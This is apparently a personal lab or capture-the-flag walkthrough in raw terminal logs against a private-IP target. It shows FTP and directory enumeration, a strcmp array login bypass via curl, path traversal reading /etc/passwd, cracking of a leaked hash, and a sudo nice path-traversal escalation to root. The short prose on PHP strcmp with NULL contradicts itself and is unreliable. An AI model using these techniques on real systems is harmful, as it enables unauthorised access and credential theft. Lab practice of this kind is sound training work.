


                                                                                                           
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.167.101 2112
Connected to 192.168.167.101.
220 ProFTPD Server (Debian) [::ffff:192.168.167.101]
Name (192.168.167.101:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.45.210 !
230-
230-The local time is: Thu Oct 02 12:30:58 2025
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||15894|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
226 Transfer complete
ftp> cat welcome.msg
?Invalid command.
ftp> more welcome.msg
Welcome, archive user %U@%R !

The local time is: %T

ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||55389|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
   901       17.53 MiB/s 
226 Transfer complete
901 bytes received in 00:00 (21.64 KiB/s)
ftp> exit
221 Goodbye.
                                                                                                                     
┌──(root㉿kali)-[/home/kali]
└─# cat index.php.bak                                                 
<html>
<head></head>
<body>

<?php

$pass= "potato"; //note Change this password regularly

if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
  }
  exit();
}
?>


  <form action="index.php?login=1" method="POST">
                <h1>Login</h1>
                <label><b>User:</b></label>
                <input type="text" name="username" required>
                </br>
                <label><b>Password:</b></label>
                <input type="password" name="password" required>
                </br>
                <input type="submit" id='submit' value='Login' >
  </form>
</body>
</html>

                                                                                                                     
┌──(root㉿kali)-[/home/kali]
└─# 




┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.167.101/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -x php,txt,html                           
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.167.101/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 280]
/.hta.txt             (Status: 403) [Size: 280]
/.hta.html            (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htaccess.html       (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd.html       (Status: 403) [Size: 280]
/admin                (Status: 301) [Size: 318] [--> http://192.168.167.101/admin/]


┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.167.101/admin -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.167.101/admin
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.txt             (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.hta.html            (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htaccess.html       (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.htpasswd.html       (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 466]
/index.php            (Status: 200) [Size: 466]
/logs                 (Status: 301) [Size: 323] [--> http://192.168.167.101/admin/logs/]
Progress: 18984 / 18988 (99.98%)
===============================================================
Finished
===============================================================




If either $_POST['username'] or $_POST['password'] is not set, PHP will treat them as NULL. In PHP, strcmp(NULL, "admin") returns 0 (true) because both are converted to empty strings, so strcmp("", "admin") returns -1, but strcmp(NULL, NULL) returns 0.

But more importantly, if you send both parameters as arrays (e.g., username[]=a), then strcmp(array, string) will return NULL, which is treated as 0 (true) in a loose comparison.

┌──(root㉿kali)-[/home/kali]
└─# curl -L -i -X POST "http://192.168.167.101/admin/index.php?login=1" \
  -d "username[]=a&password[]=a"
HTTP/1.1 200 OK
Date: Thu, 02 Oct 2025 12:52:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh; expires=Fri, 02-Oct-2026 12:52:55 GMT; Max-Age=31536000
Vary: Accept-Encoding
Content-Length: 91
Content-Type: text/html; charset=UTF-8

<html>
<head></head>
<body>

Welcome! </br> Go to the <a href="dashboard.php">dashboard</a>                                                                                                                     
┌──(root㉿kali)-[/home/kali]
└─# 

┌──(root㉿kali)-[/home/kali]
└─# curl -b "pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh" \
  -X POST "http://192.168.167.101/admin/dashboard.php?page=log" \
  -d "file=../../../../../../etc/passwd"
<html>
<head><title>Admin area</title></head>
<body>
<a href="dashboard.php"> Home </a>&emsp;
<a href="dashboard.php?page=users">Users </a>&emsp;
<a href="dashboard.php?page=date"> Date </a>&emsp;
<a href="dashboard.php?page=log"> Logs </a>&emsp;
<a href="dashboard.php?page=ping"> Ping </a>

<h2>show log:</h2>

<form action="dashboard.php?page=log" method="post">

<div>
  <input type="radio" name="file" value="log_03.txt">
  <label for="log_03.txt">log_03.txt</label>
</div><div>
  <input type="radio" name="file" value="log_02.txt">
  <label for="log_02.txt">log_02.txt</label>
</div><div>
  <input type="radio" name="file" value="log_01.txt">
  <label for="log_01.txt">log_01.txt</label>
</div></br></br>
    <div class="button">
        <button type="submit">Get the log</button>
    </div>
</form>

Contenu du fichier ../../../../../../etc/passwd :  </br><PRE>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
florianges:x:1000:1000:florianges:/home/florianges:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
</PRE>                                                                                                                     
┌──(root㉿kali)-[/home/kali]
└─# 

hash cracked to
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon           (webadmin)   


┌──(root㉿kali)-[/home/kali]
└─# ssh webadmin@192.168.167.101     
...

webadmin@serv:~$ ls
local.txt  user.txt
webadmin@serv:~$ cat local.txt
d4d9d84559d856a273138506d60c7496
webadmin@serv:~$ cat user.txt
Your flag is in another file...
webadmin@serv:~$ sudo -l
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$ 
webadmin@serv:~$ cd /notes/
webadmin@serv:/notes$ ls
clear.sh  id.sh
webadmin@serv:/notes$ cat id.sh
cat: id.sh: Permission denied
webadmin@serv:/notes$ id.sh
id.sh: command not found
webadmin@serv:/notes$ ./id.sh
-bash: ./id.sh: Permission denied
webadmin@serv:/notes$ sudo /bin/nice /notes/../../../../bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# 



